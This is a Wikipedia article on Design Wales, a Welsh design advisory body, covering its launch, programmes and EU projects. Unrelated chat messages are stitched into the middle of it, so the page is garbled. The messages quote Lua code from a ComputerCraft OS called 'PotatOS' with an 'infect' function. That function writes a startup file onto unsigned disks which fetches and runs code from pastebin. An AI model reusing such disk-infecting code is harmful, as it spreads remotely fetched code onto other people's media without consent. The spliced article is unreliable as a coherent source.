Design Wales

Design Wales is an organisation based at the National Centre for Product Design & Development Research (PDR) at Cardiff Metropolitan University, which over the years has raised the profile and increased the use of design within the Wales’ economy. This to a great extent has been achieved by providing one to one design advise directly to Welsh companies and organisations.

Design Wales

Background

Design Wales was launched in December 1994 by the Secretary of State for Wales, John Redwood, as the Welsh Design Advisory Service. In the April 2000 it was renamed Design Wales. Over the last few years Design Wales has also initiated several design programmes for companies based in Wales, these have included 'Understanding computer-aided design', 'Design In The Food Sector','Brand Essentials' and the 'Service Design Programme'.

Service Design Programme

The Service Design Programme helps Welsh design and advanced manufacturing companies use service design to increase competitiveness, innovation and capacity, as well as generating new employment opportunities in Wales.

The programme is operating from July 2010 to August 2013, funded by the Welsh Assembly Government Department for Economy and Transport. Over the three years Design Wales will deliver a number of service design activities to both sectors.

Design Wales Forum

Design Wales Forum is a network for designers in Wales, established in 2010 by Design Wales. A key aim of the Design Wales Forum is create activity which supports the maintenance and capacity growth of the Welsh design community. The Design Wales Forum actively promotes the economic benefits of design to the business community.

SEE Platform

Between 2012 and 2015, Design Wales are leading a European Commission network of 11 partners called the SEE Platform. SEE aims to accelerate the integration of design into innovation policies and programmes. Policy-makers and programme managers can attend free workshops to understand the role of design in innovation in their region.[1]

SEEdesign

Between 2005 and 2007, Design Wales co-ordinated the EU-funded programme "SEEdesign"–Sharing Experience on Design Support for SMEs. Other partners were Design Flanders, The Design Centre of the Czech Republic, Design Centre Rhone-Alps, Experimental Centre for Furniture and Furnishing (Italy), Danish Design Centre, and the University of Manchester (ESRC Centre for Research on Innovation and Competition - CRIC).

SEEProject

Between September 2008 and June 2011 Design Wales are coordinating the EU-funded (INTERREG) programme SEEProject. Leading eleven design organisations from across Europe the SEEProject seeks to understand and develop the role of design in realising regional and national innovation policy.

[2] [3] [4] [5] [6] [7] [8]

gollark: The relevant code:```lualocal function infect(disk_side) local mp = disk.getMountPath(disk_side) if not mp then return end local ds = fs.combine(mp, "startup") -- Find paths to startup and signature files local disk_ID = disk.getID(disk_side) local sig_file = fs.combine(mp, "signature") -- shell.run disks marked with the Brand of PotatOS -- except not actually, it's cool and uses load now if fs.exists(ds) and fs.exists(sig_file) then local code = fread(ds) local sig_raw = fread(sig_file) local sig if sig_raw:find "{" then sig = textutils.unserialise(sig_raw) else sig = unhexize(sig_raw) end disk.eject(disk_side) if verify(code, sig) then -- run code, but safely (via pcall) -- print output for debugging print "Signature Valid; PotatOS Disk Loading" local out, err = load(code, "@disk/startup", nil, external_env) if not out then printError(err) else local ok, res = pcall(out, { side = disk_side, mount_path = mp, ID = disk_ID }) if ok then print(textutils.serialise(res)) else printError(res) end end else printError "Invalid Signature!" printError "Initiating Procedure 5." end -- if they're not PotatOS'd, write it on else fwrite(ds, "shell.run 'pastebin run RM13UGFa update' -- PotatOS") endend```
gollark: <@151391317740486657> What key exactly?
gollark: <@151391317740486657> Only digitally signed ones are run unsandboxed. You cannot sign a disk without the private key or probably utterly impractical hackery.
gollark: Basically, any disk you make *will not be run unsandboxed* on a regular potatOS install.
gollark: <@151391317740486657>

References

  1. "SEE Platform". Archived from the original on 15 June 2012. Retrieved 14 June 2012.
  2. Wales On-line - Graphic warning: Grab the best or they’ll go
  3. "Archived copy". Archived from the original on 2008-06-26. Retrieved 2008-07-09.CS1 maint: archived copy as title (link)
  4. "DMI Publications - DMI Review Article". Archived from the original on 2007-02-17. Retrieved 2008-07-09.
  5. Profitable by design - Daily Post North Wales
  6. http://www.designwales.org.uk/designwalessf/Img/programme_south.pdf
  7. "Archived copy" (PDF). Archived from the original (PDF) on 2006-05-27. Retrieved 2008-07-09.CS1 maint: archived copy as title (link)
  8. Mudpie :: design wales’ trend event (gbr)
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.